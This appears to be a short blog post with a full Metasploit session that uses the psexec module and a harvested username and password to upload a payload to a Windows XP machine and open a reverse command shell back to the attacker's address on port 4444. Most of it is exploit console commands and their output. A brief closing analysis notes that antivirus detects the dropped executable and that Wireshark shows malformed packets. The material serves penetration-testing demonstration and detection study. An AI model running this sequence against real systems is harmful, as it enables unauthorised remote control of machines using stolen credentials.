The following example makes use of a previously acquired set of
credentials to exploit and gain a reverse shell on the target system.
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.1.100 RHOST => 192.168.1.100 msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(psexec) > set LPORT 4444 LPORT => 4444 msf exploit(psexec) > set SMBUSER victim SMBUSER => victim msf exploit(psexec) > set SMBPASS s3cr3t SMBPASS => s3cr3t msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user 'victim'... [*] Uploading payload... [*] Created \hikmEeEM.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hikmEeEM.exe... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
--------------------------------------------------------------------------------
Analysis:-
hikmEeEM.exe File generated in c:\windows\hikmEeEM.exe and deleted after establishing connection.
this file is detected by All Antivirus.
https://www.virustotal.com/file/6a1fcc88b5e1322dac078f9b07892aa31625504961f8b5063e467537f7b3eb49/analysis/1353334338/
| Detection ratio: | 28 / 43 |
u can see shell returned by using wireshark
channeldata turn message malformed packet's :-
Two packets are detected as malformed packet by wireshark
No comments:
Post a Comment